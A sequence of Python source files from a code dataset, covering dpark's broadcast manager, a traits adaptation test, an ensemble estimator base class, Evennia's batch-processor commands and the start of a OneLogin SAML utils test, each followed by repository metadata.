for _addr, _bitmap in remote:
_indices = [i for i in range(block_num) if not bitmap[i] and _bitmap[i]]
if _indices:
self.random_inst.shuffle(_indices)
_fetch(_addr, _indices[:BATCHED_BLOCKS], _bitmap)
self._update_sources(uuid, bitmap, download_guide_sock)
sources = self._get_sources(uuid, download_guide_sock)
write_mmap_handler.flush()
write_mmap_handler.close()
self.shared_uuid_map_dict[uuid] = bitmap
self.shared_uuid_fn_dict[uuid] = self.uuid_state_dict[uuid][0]
self.uuid_state_dict[uuid] = self.uuid_state_dict[uuid][0], True
download_guide_sock.close()
with self.download_cond:
self.download_cond.notify_all()
def clear(self, uuid):
if uuid in self.master_broadcast_blocks:
del self.master_broadcast_blocks[uuid]
del self.shared_master_blocks[uuid]
if uuid in self.uuid_state_dict:
del self.uuid_state_dict[uuid]
if uuid in self.shared_uuid_fn_dict:
del self.shared_uuid_fn_dict[uuid]
del self.shared_uuid_map_dict[uuid]
def shutdown(self):
if not self._started:
return
self._started = False
if self.server_thread and self.server_addr. \
startswith('tcp://%s:' % socket.gethostname()):
for _, th in six.iteritems(self.download_threads):
th.join(timeout=0.1) # only in executor, not needed
self.server_thread.join(timeout=1)
if self.server_thread.is_alive():
logger.warning("Download mananger server_thread not stopped.")
self.manager.shutdown() # shutdown will try join and terminate server process
def accumulate_list(l):
acc = 0
acc_l = []
for item in l:
acc_l.append(acc)
acc += item
acc_l.append(acc)
return acc_l
class BroadcastManager(object):
header_fmt = '>BI'
header_len = struct.calcsize(header_fmt)
def __init__(self):
self._started = False
self.guide_addr = None
self.download_addr = None
self.cache = None
self.shared_uuid_fn_dict = None
self.shared_uuid_map_dict = None
self.download_cond = None
self.ctx = None
def start(self):
if self._started:
return
self._started = True
start_download_manager()
self.guide_addr = env.get(GUIDE_ADDR)
self.download_addr = env.get(DOWNLOAD_ADDR)
self.cache = Cache()
self.ctx = zmq.Context()
self.shared_uuid_fn_dict = _download_manager.shared_uuid_fn_dict
self.shared_uuid_map_dict = _download_manager.shared_uuid_map_dict
self.download_cond = _download_manager.download_cond
def register(self, uuid, value):
self.start()
if uuid in self.shared_uuid_fn_dict:
raise RuntimeError('broadcast %s has already registered' % uuid)
blocks, size, block_map = self.to_blocks(uuid, value)
_download_manager.register_blocks(uuid, blocks)
self._update_sources(uuid, block_map)
self.cache.put(uuid, value)
return size
def _update_sources(self, uuid, bitmap):
guide_sock = self.ctx.socket(zmq.REQ)
try:
guide_sock.setsockopt(zmq.LINGER, 0)
guide_sock.connect(self.guide_addr)
guide_sock.send_pyobj((GUIDE_SET_SOURCES,
(uuid, self.download_addr, bitmap)))
guide_sock.recv_pyobj()
finally:
guide_sock.close()
def clear(self, uuid):
assert self._started
self.cache.put(uuid, None)
sock = self.ctx.socket(zmq.REQ)
sock.connect(self.download_addr)
sock.send_pyobj((SERVER_CLEAR_ITEM, uuid))
sock.recv_pyobj()
sock.close()
def fetch(self, uuid, compressed_size):
start_download_manager()
self.start()
value = self.cache.get(uuid)
if value is not None:
return value
blocks = _download_manager.get_blocks(uuid)
if blocks is None:
blocks = self.fetch_blocks(uuid, compressed_size)
value = self.from_blocks(uuid, blocks)
return value
@staticmethod
def _get_blocks_by_filename(file_name, block_map):
fp = open(file_name, 'rb')
buf = fp.read()
blocks = [buf[offset: offset + size] for offset, size in block_map]
fp.close()
return blocks
def fetch_blocks(self, uuid, compressed_size):
if uuid in self.shared_uuid_fn_dict:
return self._get_blocks_by_filename(self.shared_uuid_fn_dict[uuid],
self.shared_uuid_map_dict[uuid])
download_sock = self.ctx.socket(zmq.REQ)
download_sock.connect(self.download_addr)
download_sock.send_pyobj((DATA_GET,
(uuid, compressed_size)))
res = download_sock.recv_pyobj()
if res == DATA_GET_OK:
return self._get_blocks_by_filename(self.shared_uuid_fn_dict[uuid],
self.shared_uuid_map_dict[uuid])
if res == DATA_GET_FAIL:
raise RuntimeError('Data GET failed for uuid:%s' % uuid)
while True:
with self.download_cond:
if uuid not in self.shared_uuid_fn_dict:
self.download_cond.wait()
else:
break
if uuid in self.shared_uuid_fn_dict:
return self._get_blocks_by_filename(self.shared_uuid_fn_dict[uuid],
self.shared_uuid_map_dict[uuid])
else:
raise RuntimeError('get blocks failed')
def to_blocks(self, uuid, obj):
try:
if marshalable(obj):
buf = marshal.dumps((uuid, obj))
type_ = MARSHAL_TYPE
else:
buf = cPickle.dumps((uuid, obj), -1)
type_ = PICKLE_TYPE
except Exception:
buf = cPickle.dumps((uuid, obj), -1)
type_ = PICKLE_TYPE
checksum = binascii.crc32(buf) & 0xFFFF
stream = struct.pack(self.header_fmt, type_, checksum) + buf
blockNum = (len(stream) + (BLOCK_SIZE - 1)) >> BLOCK_SHIFT
blocks = [compress(stream[i * BLOCK_SIZE:(i + 1) * BLOCK_SIZE]) for i in range(blockNum)]
sizes = [len(block) for block in blocks]
size_l = accumulate_list(sizes)
block_map = list(izip(size_l[:-1], sizes))
return blocks, size_l[-1], block_map
def from_blocks(self, uuid, blocks):
stream = b''.join(map(decompress, blocks))
type_, checksum = struct.unpack(self.header_fmt, stream[:self.header_len])
buf = stream[self.header_len:]
_checksum = binascii.crc32(buf) & 0xFFFF
if _checksum != checksum:
raise RuntimeError('Wrong blocks: checksum: %s, expected: %s' % (
_checksum, checksum))
if type_ == MARSHAL_TYPE:
_uuid, value = marshal.loads(buf)
elif type_ == PICKLE_TYPE:
_uuid, value = cPickle.loads(buf)
else:
raise RuntimeError('Unknown serialization type: %s' % type_)
if uuid != _uuid:
raise RuntimeError('Wrong blocks: uuid: %s, expected: %s' % (_uuid, uuid))
return value
def shutdown(self):
if not self._started:
return
self._started = False
_manager = BroadcastManager()
_download_manager = DownloadManager()
_guide_manager = GuideManager()
def start_guide_manager():
_guide_manager.start()
def start_download_manager():
_download_manager.start()
def stop_manager():
_manager.shutdown()
_download_manager.shutdown()
_guide_manager.shutdown()
env.environ.pop(GUIDE_ADDR, None)
env.environ.pop(DOWNLOAD_ADDR, None)
class Broadcast(object):
def __init__(self, value):
assert value is not None, 'broadcast object should not been None'
self.uuid = str(uuid_pkg.uuid4())
self.value = value
self.compressed_size = _manager.register(self.uuid, self.value)
block_num = (self.compressed_size + BLOCK_SIZE - 1) >> BLOCK_SHIFT
self.bytes = block_num * BLOCK_SIZE
logger.info("broadcast %s in %d blocks, %d bytes", self.uuid, block_num, self.compressed_size)
def clear(self):
_manager.clear(self.uuid)
def __getstate__(self):
return self.uuid, self.compressed_size
def __setstate__(self, v):
self.uuid, self.compressed_size = v
def __getattr__(self, name):
if name != 'value':
return getattr(self.value, name)
t = time.time()
value = _manager.fetch(self.uuid, self.compressed_size)
if value is None:
raise RuntimeError("fetch broadcast failed")
env.task_stats.secs_broadcast += time.time() - t
self.value = value
return value
def __len__(self):
return len(self.value)
def __iter__(self):
return self.value.__iter__()
def __getitem__(self, key):
return self.value.__getitem__(key)
def __contains__(self, item):
return self.value.__contains__(item)
def __missing__(self, key):
return self.value.__missing__(key)
def __reversed__(self):
return self.value.__reversed__()
|
douban/dpark
|
dpark/broadcast.py
|
Python
|
bsd-3-clause
| 24,223
|
###############################################################################
# Copyright 2014 Enthought, Inc.
###############################################################################
from traits.adaptation.api import reset_global_adaptation_manager
from traits.api import HasTraits, Instance, List, register_factory, TraitError
from traits.testing.unittest_tools import unittest
class Foo(HasTraits):
pass
class Bar(HasTraits):
pass
def bar_to_foo_adapter(bar):
return Foo()
class FooContainer(HasTraits):
not_adapting_foo = Instance(Foo)
adapting_foo = Instance(Foo, adapt='yes')
not_adapting_foo_list = List(Foo)
adapting_foo_list = List(Instance(Foo, adapt='yes'))
class TestAutomaticAdaptation(unittest.TestCase):
#### 'TestCase' protocol ##################################################
def setUp(self):
reset_global_adaptation_manager()
#### Tests ################################################################
def test_instance_trait_automatic_adaptation(self):
bar = Bar()
foo_container = FooContainer()
# Before a Bar->Foo adapter is registered.
with self.assertRaises(TraitError):
foo_container.not_adapting_foo = bar
with self.assertRaises(TraitError):
foo_container.adapting_foo = bar
# After a Bar->Foo adapter is registered.
register_factory(bar_to_foo_adapter, Bar, Foo)
with self.assertRaises(TraitError):
foo_container.not_adapting_foo = bar
foo_container.adapting_foo = bar
self.assertIsInstance(foo_container.adapting_foo, Foo)
def test_list_trait_automatic_adaptation(self):
bar = Bar()
foo_container = FooContainer()
# Before a Bar->Foo adapter is registered.
with self.assertRaises(TraitError):
foo_container.not_adapting_foo_list = [bar]
with self.assertRaises(TraitError):
foo_container.adapting_foo_list = [bar]
# After a Bar->Foo adapter is registered.
register_factory(bar_to_foo_adapter, Bar, Foo)
with self.assertRaises(TraitError):
foo_container.not_adapting_foo_list = [bar]
foo_container.adapting_foo_list = [bar]
self.assertIsInstance(foo_container.adapting_foo_list[0], Foo)
|
burnpanck/traits
|
traits/tests/test_automatic_adaptation.py
|
Python
|
bsd-3-clause
| 2,338
|
"""
Base class for ensemble-based estimators.
"""
# Authors: Gilles Louppe
# License: BSD 3 clause
import multiprocessing
import numpy as np
from ..base import clone
from ..base import BaseEstimator
from ..base import MetaEstimatorMixin
class BaseEnsemble(BaseEstimator, MetaEstimatorMixin):
"""Base class for all ensemble classes.
Warning: This class should not be used directly. Use derived classes
instead.
Parameters
----------
base_estimator : object, optional (default=None)
The base estimator from which the ensemble is built.
n_estimators : integer
The number of estimators in the ensemble.
estimator_params : list of strings
The list of attributes to use as parameters when instantiating a
new base estimator. If none are given, default parameters are used.
Attributes
----------
base_estimator_ : estimator
The base estimator from which the ensemble is grown.
estimators_ : list of estimators
The collection of fitted base estimators.
"""
def __init__(self, base_estimator, n_estimators=10,
estimator_params=tuple()):
# Set parameters
self.base_estimator = base_estimator
self.n_estimators = n_estimators
self.estimator_params = estimator_params
# Don't instantiate estimators now! Parameters of base_estimator might
# still change. Eg., when grid-searching with the nested object syntax.
# This needs to be filled by the derived classes.
self.estimators_ = []
def _validate_estimator(self, default=None):
"""Check the estimator and the n_estimator attribute, set the
`base_estimator_` attribute."""
if self.n_estimators <= 0:
raise ValueError("n_estimators must be greater than zero, "
"got {0}.".format(self.n_estimators))
if self.base_estimator is not None:
self.base_estimator_ = self.base_estimator
else:
self.base_estimator_ = default
if self.base_estimator_ is None:
raise ValueError("base_estimator cannot be None")
def _make_estimator(self, append=True):
"""Make and configure a copy of the `base_estimator_` attribute.
Warning: This method should be used to properly instantiate new
sub-estimators.
"""
estimator = clone(self.base_estimator_)
estimator.set_params(**dict((p, getattr(self, p))
for p in self.estimator_params))
if append:
self.estimators_.append(estimator)
return estimator
def __len__(self):
"""Returns the number of estimators in the ensemble."""
return len(self.estimators_)
def __getitem__(self, index):
"""Returns the index'th estimator in the ensemble."""
return self.estimators_[index]
def __iter__(self):
"""Returns iterator over estimators in the ensemble."""
return iter(self.estimators_)
def _partition_estimators(n_estimators, n_jobs):
"""Private function used to partition estimators between jobs."""
# Compute the number of jobs
n_jobs = min(_get_n_jobs(n_jobs), n_estimators)
# Partition estimators between jobs
n_estimators_per_job = (n_estimators // n_jobs) * np.ones(n_jobs,
dtype=np.int)
n_estimators_per_job[:n_estimators % n_jobs] += 1
starts = np.cumsum(n_estimators_per_job)
return n_jobs, n_estimators_per_job.tolist(), [0] + starts.tolist()
def _get_n_jobs(n_jobs):
"""Get number of jobs for the computation.
This function reimplements the logic of joblib to determine the actual
number of jobs depending on the cpu count. If -1 all CPUs are used.
If 1 is given, no parallel computing code is used at all, which is useful
for debugging. For n_jobs below -1, (n_cpus + 1 + n_jobs) are used.
Thus for n_jobs = -2, all CPUs but one are used.
Parameters
----------
n_jobs : int
Number of jobs stated in joblib convention.
Returns
-------
n_jobs : int
The actual number of jobs as positive integer.
Examples
--------
>>> from sklearn.utils import _get_n_jobs
>>> _get_n_jobs(4)
4
>>> jobs = _get_n_jobs(-2)
>>> assert jobs == max(cpu_count() - 1, 1)
>>> _get_n_jobs(0)
Traceback (most recent call last):
...
ValueError: Parameter n_jobs == 0 has no meaning.
"""
if n_jobs < 0:
return max(multiprocessing.cpu_count() + 1 + n_jobs, 1)
elif n_jobs == 0:
raise ValueError('Parameter n_jobs == 0 has no meaning.')
else:
return n_jobs
|
psarka/uplift
|
uplift/ensemble/base.py
|
Python
|
bsd-3-clause
| 4,748
|
"""
Batch processors
These commands implements the 'batch-command' and 'batch-code'
processors, using the functionality in src.utils.batchprocessors.
They allow for offline world-building.
Batch-command is the simpler system. This reads a file (*.ev)
containing a list of in-game commands and executes them in sequence as
if they had been entered in the game (including permission checks
etc).
Example batch-command file: game/gamesrc/commands/examples/batch_cmds.ev
Batch-code is a full-fledged python code interpreter that reads blocks
of python code (*.py) and executes them in sequence. This allows for
much more power than Batch-command, but requires knowing Python and
the Evennia API. It is also a severe security risk and should
therefore always be limited to superusers only.
Example batch-code file: game/gamesrc/commands/examples/batch_code.py
"""
from traceback import format_exc
from django.conf import settings
from src.utils.batchprocessors import BATCHCMD, BATCHCODE
from src.commands.cmdset import CmdSet
from src.commands.default.muxcommand import MuxCommand
from src.utils import utils
# limit symbols for API inclusion
__all__ = ("CmdBatchCommands", "CmdBatchCode")
_HEADER_WIDTH = 70
_UTF8_ERROR = \
"""
{rDecode error in '%s'.{n
This file contains non-ascii character(s). This is common if you
wrote some input in a language that has more letters and special
symbols than English; such as accents or umlauts. This is usually
fine and fully supported! But for Evennia to know how to decode such
characters in a universal way, the batchfile must be saved with the
international 'UTF-8' encoding. This file is not.
Please re-save the batchfile with the UTF-8 encoding (refer to the
documentation of your text editor on how to do this, or switch to a
better featured one) and try again.
The (first) error was found with a character on line %s in the file.
"""
_PROCPOOL_BATCHCMD_SOURCE = """
from src.commands.default.batchprocess import batch_cmd_exec, step_pointer, BatchSafeCmdSet
caller.ndb.batch_stack = commands
caller.ndb.batch_stackptr = 0
caller.ndb.batch_batchmode = "batch_commands"
caller.cmdset.add(BatchSafeCmdSet)
for inum in range(len(commands)):
print "command:", inum
caller.cmdset.add(BatchSafeCmdSet)
if not batch_cmd_exec(caller):
break
step_pointer(caller, 1)
print "leaving run ..."
"""
_PROCPOOL_BATCHCODE_SOURCE = """
from src.commands.default.batchprocess import batch_code_exec, step_pointer, BatchSafeCmdSet
caller.ndb.batch_stack = codes
caller.ndb.batch_stackptr = 0
caller.ndb.batch_batchmode = "batch_code"
caller.cmdset.add(BatchSafeCmdSet)
for inum in range(len(codes)):
print "code:", inum
caller.cmdset.add(BatchSafeCmdSet)
if not batch_code_exec(caller):
break
step_pointer(caller, 1)
print "leaving run ..."
"""
#------------------------------------------------------------
# Helper functions
#------------------------------------------------------------
def format_header(caller, entry):
"""
Formats a header
"""
width = _HEADER_WIDTH - 10
entry = entry.strip()
header = utils.crop(entry, width=width)
ptr = caller.ndb.batch_stackptr + 1
stacklen = len(caller.ndb.batch_stack)
header = "{w%02i/%02i{G: %s{n" % (ptr, stacklen, header)
# add extra space to the side for padding.
header = "%s%s" % (header, " "*(width - len(header)))
header = header.replace('\n', '\\n')
return header
def format_code(entry):
"""
Formats the viewing of code and errors
"""
code = ""
for line in entry.split('\n'):
code += "\n{G>>>{n %s" % line
return code.strip()
def batch_cmd_exec(caller):
"""
Helper function for executing a single batch-command entry
"""
ptr = caller.ndb.batch_stackptr
stack = caller.ndb.batch_stack
command = stack[ptr]
caller.msg(format_header(caller, command))
try:
caller.execute_cmd(command)
except Exception:
caller.msg(format_code(format_exc()))
return False
return True
def batch_code_exec(caller):
"""
Helper function for executing a single batch-code entry
"""
ptr = caller.ndb.batch_stackptr
stack = caller.ndb.batch_stack
debug = caller.ndb.batch_debug
codedict = stack[ptr]
caller.msg(format_header(caller, codedict['code']))
err = BATCHCODE.code_exec(codedict,
extra_environ={"caller":caller}, debug=debug)
if err:
caller.msg(format_code(err))
return False
return True
def step_pointer(caller, step=1):
"""
Step in stack, returning the item located.
stackptr - current position in stack
stack - the stack of units
step - how many steps to move from stackptr
"""
ptr = caller.ndb.batch_stackptr
stack = caller.ndb.batch_stack
nstack = len(stack)
if ptr + step <= 0:
caller.msg("{RBeginning of batch file.")
if ptr + step >= nstack:
caller.msg("{REnd of batch file.")
caller.ndb.batch_stackptr = max(0, min(nstack-1, ptr + step))
def show_curr(caller, showall=False):
"""
Show the current position in stack
"""
stackptr = caller.ndb.batch_stackptr
stack = caller.ndb.batch_stack
if stackptr >= len(stack):
caller.ndb.batch_stackptr = len(stack) - 1
show_curr(caller, showall)
return
entry = stack[stackptr]
if type(entry) == dict:
# this is a batch-code entry
string = format_header(caller, entry['code'])
codeall = entry['code'].strip()
else:
# this is a batch-cmd entry
string = format_header(caller, entry)
codeall = entry.strip()
string += "{G(hh for help)"
if showall:
for line in codeall.split('\n'):
string += "\n{G|{n %s" % line
caller.msg(string)
def purge_processor(caller):
"""
This purges all effects running
on the caller.
"""
try:
del caller.ndb.batch_stack
del caller.ndb.batch_stackptr
del caller.ndb.batch_pythonpath
del caller.ndb.batch_batchmode
except:
pass
# clear everything but the default cmdset.
caller.cmdset.delete(BatchSafeCmdSet)
caller.cmdset.clear()
caller.scripts.validate() # this will purge interactive mode
#------------------------------------------------------------
# main access commands
#------------------------------------------------------------
class CmdBatchCommands(MuxCommand):
"""
Build from batch-command file
Usage:
@batchcommands[/interactive] <python.path.to.file>
Switch:
interactive - this mode will offer more control when
executing the batch file, like stepping,
skipping, reloading etc.
Runs batches of commands from a batch-cmd text file (*.ev).
"""
key = "@batchcommands"
aliases = ["@batchcommand", "@batchcmd"]
locks = "cmd:perm(batchcommands) or superuser()"
help_category = "Building"
def func(self):
"Starts the processor."
caller = self.caller
args = self.args
if not args:
caller.msg("Usage: @batchcommands[/interactive] <path.to.file>")
return
python_path = self.args
#parse indata file
try:
commands = BATCHCMD.parse_file(python_path)
except UnicodeDecodeError, err:
lnum = err.linenum
caller.msg(_UTF8_ERROR % (python_path, lnum))
return
if not commands:
string = "'%s' not found.\nYou have to supply the python path "
string += "of the file relative to \none of your batch-file directories (%s)."
caller.msg(string % (python_path, ", ".join(settings.BASE_BATCHPROCESS_PATHS)))
return
switches = self.switches
# Store work data in cache
caller.ndb.batch_stack = commands
caller.ndb.batch_stackptr = 0
caller.ndb.batch_pythonpath = python_path
caller.ndb.batch_batchmode = "batch_commands"
caller.cmdset.add(BatchSafeCmdSet)
if 'inter' in switches or 'interactive' in switches:
# Allow more control over how batch file is executed
# Set interactive state directly
caller.cmdset.add(BatchInteractiveCmdSet)
caller.msg("\nBatch-command processor - Interactive mode for %s ..." % python_path)
show_curr(caller)
else:
caller.msg("Running Batch-command processor - Automatic mode for %s (this might take some time) ..." % python_path)
procpool = False
if "PythonProcPool" in utils.server_services():
if utils.uses_database("sqlite3"):
caller.msg("Batchprocessor disabled ProcPool under SQLite3.")
else:
procpool=True
if procpool:
# run in parallel process
def callback(r):
caller.msg(" {GBatchfile '%s' applied." % python_path)
purge_processor(caller)
def errback(e):
caller.msg(" {RError from processor: '%s'" % e)
purge_processor(caller)
utils.run_async(_PROCPOOL_BATCHCMD_SOURCE, commands=commands, caller=caller, at_return=callback, at_err=errback)
else:
# run in-process (might block)
for inum in range(len(commands)):
# loop through the batch file
if not batch_cmd_exec(caller):
return
step_pointer(caller, 1)
# clean out the safety cmdset and clean out all other temporary attrs.
string = " Batchfile '%s' applied." % python_path
caller.msg("{G%s" % string)
purge_processor(caller)
class CmdBatchCode(MuxCommand):
"""
Build from batch-code file
Usage:
@batchcode[/interactive] <python path to file>
Switch:
interactive - this mode will offer more control when
executing the batch file, like stepping,
skipping, reloading etc.
debug - auto-delete all objects that has been marked as
deletable in the script file (see example files for
syntax). This is useful so as to to not leave multiple
object copies behind when testing out the script.
Runs batches of commands from a batch-code text file (*.py).
"""
key = "@batchcode"
aliases = ["@batchcodes"]
locks = "cmd:superuser()"
help_category = "Building"
def func(self):
"Starts the processor."
caller = self.caller
args = self.args
if not args:
caller.msg("Usage: @batchcode[/interactive/debug] <path.to.file>")
return
python_path = self.args
#parse indata file
try:
codes = BATCHCODE.parse_file(python_path)
except UnicodeDecodeError, err:
lnum = err.linenum
caller.msg(_UTF8_ERROR % (python_path, lnum))
return
if not codes:
string = "'%s' not found.\nYou have to supply the python path "
string += "of the file relative to \nyour batch-file directories (%s)."
caller.msg(string % (python_path, ", ".join(settings.BASE_BATCHPROCESS_PATHS)))
return
switches = self.switches
debug = False
if 'debug' in switches:
debug = True
# Store work data in cache
caller.ndb.batch_stack = codes
caller.ndb.batch_stackptr = 0
caller.ndb.batch_pythonpath = python_path
caller.ndb.batch_batchmode = "batch_code"
caller.ndb.batch_debug = debug
caller.cmdset.add(BatchSafeCmdSet)
if 'inter' in switches or 'interactive'in switches:
# Allow more control over how batch file is executed
# Set interactive state directly
caller.cmdset.add(BatchInteractiveCmdSet)
caller.msg("\nBatch-code processor - Interactive mode for %s ..." % python_path)
show_curr(caller)
else:
caller.msg("Running Batch-code processor - Automatic mode for %s ..." % python_path)
procpool = False
if "PythonProcPool" in utils.server_services():
if utils.uses_database("sqlite3"):
caller.msg("Batchprocessor disabled ProcPool under SQLite3.")
else:
procpool=True
if procpool:
# run in parallel process
def callback(r):
caller.msg(" {GBatchfile '%s' applied." % python_path)
purge_processor(caller)
def errback(e):
caller.msg(" {RError from processor: '%s'" % e)
purge_processor(caller)
utils.run_async(_PROCPOOL_BATCHCODE_SOURCE, codes=codes, caller=caller, at_return=callback, at_err=errback)
else:
# un in-process (will block)
for inum in range(len(codes)):
# loop through the batch file
if not batch_code_exec(caller):
return
step_pointer(caller, 1)
# clean out the safety cmdset and clean out all other temporary attrs.
string = " Batchfile '%s' applied." % python_path
caller.msg("{G%s" % string)
purge_processor(caller)
#------------------------------------------------------------
# State-commands for the interactive batch processor modes
# (these are the same for both processors)
#------------------------------------------------------------
class CmdStateAbort(MuxCommand):
"""
@abort
This is a safety feature. It force-ejects us out of the processor and to
the default cmdset, regardless of what current cmdset the processor might
have put us in (e.g. when testing buggy scripts etc).
"""
key = "@abort"
help_category = "BatchProcess"
locks = "cmd:perm(batchcommands)"
def func(self):
"Exit back to default."
purge_processor(self.caller)
self.caller.msg("Exited processor and reset out active cmdset back to the default one.")
class CmdStateLL(MuxCommand):
"""
ll
Look at the full source for the current
command definition.
"""
key = "ll"
help_category = "BatchProcess"
locks = "cmd:perm(batchcommands)"
def func(self):
show_curr(self.caller, showall=True)
class CmdStatePP(MuxCommand):
"""
pp
Process the currently shown command definition.
"""
key = "pp"
help_category = "BatchProcess"
locks = "cmd:perm(batchcommands)"
def func(self):
"""
This checks which type of processor we are running.
"""
caller = self.caller
if caller.ndb.batch_batchmode == "batch_code":
batch_code_exec(caller)
else:
batch_cmd_exec(caller)
class CmdStateRR(MuxCommand):
"""
rr
Reload the batch file, keeping the current
position in it.
"""
key = "rr"
help_category = "BatchProcess"
locks = "cmd:perm(batchcommands)"
def func(self):
caller = self.caller
if caller.ndb.batch_batchmode == "batch_code":
new_data = BATCHCODE.parse_file(caller.ndb.batch_pythonpath)
else:
new_data = BATCHCMD.parse_file(caller.ndb.batch_pythonpath)
caller.ndb.batch_stack = new_data
caller.msg(format_code("File reloaded. Staying on same command."))
show_curr(caller)
class CmdStateRRR(MuxCommand):
"""
rrr
Reload the batch file, starting over
from the beginning.
"""
key = "rrr"
help_category = "BatchProcess"
locks = "cmd:perm(batchcommands)"
def func(self):
caller = self.caller
if caller.ndb.batch_batchmode == "batch_code":
BATCHCODE.parse_file(caller.ndb.batch_pythonpath)
else:
BATCHCMD.parse_file(caller.ndb.batch_pythonpath)
caller.ndb.batch_stackptr = 0
caller.msg(format_code("File reloaded. Restarting from top."))
show_curr(caller)
class CmdStateNN(MuxCommand):
"""
nn
Go to next command. No commands are executed.
"""
key = "nn"
help_category = "BatchProcess"
locks = "cmd:perm(batchcommands)"
def func(self):
caller = self.caller
arg = self.args
if arg and arg.isdigit():
step = int(self.args)
else:
step = 1
step_pointer(caller, step)
show_curr(caller)
class CmdStateNL(MuxCommand):
"""
nl
Go to next command, viewing its full source.
No commands are executed.
"""
key = "nl"
help_category = "BatchProcess"
locks = "cmd:perm(batchcommands)"
def func(self):
caller = self.caller
arg = self.args
if arg and arg.isdigit():
step = int(self.args)
else:
step = 1
step_pointer(caller, step)
show_curr(caller, showall=True)
class CmdStateBB(MuxCommand):
"""
bb
Backwards to previous command. No commands
are executed.
"""
key = "bb"
help_category = "BatchProcess"
locks = "cmd:perm(batchcommands)"
def func(self):
caller = self.caller
arg = self.args
if arg and arg.isdigit():
step = -int(self.args)
else:
step = -1
step_pointer(caller, step)
show_curr(caller)
class CmdStateBL(MuxCommand):
"""
bl
Backwards to previous command, viewing its full
source. No commands are executed.
"""
key = "bl"
help_category = "BatchProcess"
locks = "cmd:perm(batchcommands)"
def func(self):
caller = self.caller
arg = self.args
if arg and arg.isdigit():
step = -int(self.args)
else:
step = -1
step_pointer(caller, step)
show_curr(caller, showall=True)
class CmdStateSS(MuxCommand):
"""
ss [steps]
Process current command, then step to the next
one. If steps is given,
process this many commands.
"""
key = "ss"
help_category = "BatchProcess"
locks = "cmd:perm(batchcommands)"
def func(self):
caller = self.caller
arg = self.args
if arg and arg.isdigit():
step = int(self.args)
else:
step = 1
for istep in range(step):
if caller.ndb.batch_batchmode == "batch_code":
batch_code_exec(caller)
else:
batch_cmd_exec(caller)
step_pointer(caller, 1)
show_curr(caller)
class CmdStateSL(MuxCommand):
"""
sl [steps]
Process current command, then step to the next
one, viewing its full source. If steps is given,
process this many commands.
"""
key = "sl"
help_category = "BatchProcess"
locks = "cmd:perm(batchcommands)"
def func(self):
caller = self.caller
arg = self.args
if arg and arg.isdigit():
step = int(self.args)
else:
step = 1
for istep in range(step):
if caller.ndb.batch_batchmode == "batch_code":
batch_code_exec(caller)
else:
batch_cmd_exec(caller)
step_pointer(caller, 1)
show_curr(caller)
class CmdStateCC(MuxCommand):
"""
cc
Continue to process all remaining
commands.
"""
key = "cc"
help_category = "BatchProcess"
locks = "cmd:perm(batchcommands)"
def func(self):
caller = self.caller
nstack = len(caller.ndb.batch_stack)
ptr = caller.ndb.batch_stackptr
step = nstack - ptr
for istep in range(step):
if caller.ndb.batch_batchmode == "batch_code":
batch_code_exec(caller)
else:
batch_cmd_exec(caller)
step_pointer(caller, 1)
show_curr(caller)
del caller.ndb.batch_stack
del caller.ndb.batch_stackptr
del caller.ndb.batch_pythonpath
del caller.ndb.batch_batchmode
caller.msg(format_code("Finished processing batch file."))
class CmdStateJJ(MuxCommand):
"""
j <command number>
Jump to specific command number
"""
key = "j"
help_category = "BatchProcess"
locks = "cmd:perm(batchcommands)"
def func(self):
caller = self.caller
arg = self.args
if arg and arg.isdigit():
number = int(self.args)-1
else:
caller.msg(format_code("You must give a number index."))
return
ptr = caller.ndb.batch_stackptr
step = number - ptr
step_pointer(caller, step)
show_curr(caller)
class CmdStateJL(MuxCommand):
"""
jl <command number>
Jump to specific command number and view its full source.
"""
key = "jl"
help_category = "BatchProcess"
locks = "cmd:perm(batchcommands)"
def func(self):
caller = self.caller
arg = self.args
if arg and arg.isdigit():
number = int(self.args)-1
else:
caller.msg(format_code("You must give a number index."))
return
ptr = caller.ndb.batch_stackptr
step = number - ptr
step_pointer(caller, step)
show_curr(caller, showall=True)
class CmdStateQQ(MuxCommand):
"""
qq
Quit the batchprocessor.
"""
key = "qq"
help_category = "BatchProcess"
locks = "cmd:perm(batchcommands)"
def func(self):
purge_processor(self.caller)
self.caller.msg("Aborted interactive batch mode.")
class CmdStateHH(MuxCommand):
"Help command"
key = "hh"
help_category = "BatchProcess"
locks = "cmd:perm(batchcommands)"
def func(self):
string = """
Interactive batch processing commands:
nn [steps] - next command (no processing)
nl [steps] - next & look
bb [steps] - back to previous command (no processing)
bl [steps] - back & look
jj <N> - jump to command nr N (no processing)
jl <N> - jump & look
pp - process currently shown command (no step)
ss [steps] - process & step
sl [steps] - process & step & look
ll - look at full definition of current command
rr - reload batch file (stay on current)
rrr - reload batch file (start from first)
hh - this help list
cc - continue processing to end, then quit.
qq - quit (abort all remaining commands)
@abort - this is a safety command that always is available
regardless of what cmdsets gets added to us during
batch-command processing. It immediately shuts down
the processor and returns us to the default cmdset.
"""
self.caller.msg(string)
#------------------------------------------------------------
#
# Defining the cmdsets for the interactive batchprocessor
# mode (same for both processors)
#
#------------------------------------------------------------
class BatchSafeCmdSet(CmdSet):
"""
The base cmdset for the batch processor.
This sets a 'safe' @abort command that will
always be available to get out of everything.
"""
key = "Batch_default"
priority = 104 # override other cmdsets.
def at_cmdset_creation(self):
"Init the cmdset"
self.add(CmdStateAbort())
class BatchInteractiveCmdSet(CmdSet):
"""
The cmdset for the interactive batch processor mode.
"""
key = "Batch_interactive"
priority = 104
def at_cmdset_creation(self):
"init the cmdset"
self.add(CmdStateAbort())
self.add(CmdStateLL())
self.add(CmdStatePP())
self.add(CmdStateRR())
self.add(CmdStateRRR())
self.add(CmdStateNN())
self.add(CmdStateNL())
self.add(CmdStateBB())
self.add(CmdStateBL())
self.add(CmdStateSS())
self.add(CmdStateSL())
self.add(CmdStateCC())
self.add(CmdStateJJ())
self.add(CmdStateJL())
self.add(CmdStateQQ())
self.add(CmdStateHH())
|
TaliesinSkye/evennia
|
src/commands/default/batchprocess.py
|
Python
|
bsd-3-clause
| 24,488
|
# -*- coding: utf-8 -*-
# Copyright (c) 2014, OneLogin, Inc.
# All rights reserved.
from base64 import b64decode
import json
from lxml import etree
from os.path import dirname, join, exists
import unittest
from xml.dom.minidom import parseString
from onelogin.saml2 import compat
from onelogin.saml2.constants import OneLogin_Saml2_Constants
from onelogin.saml2.settings import OneLogin_Saml2_Settings
from onelogin.saml2.utils import OneLogin_Saml2_Utils
class OneLogin_Saml2_Utils_Test(unittest.TestCase):
data_path = join(dirname(__file__), '..', '..', '..', 'data')
def loadSettingsJSON(self, filename=None):
if filename:
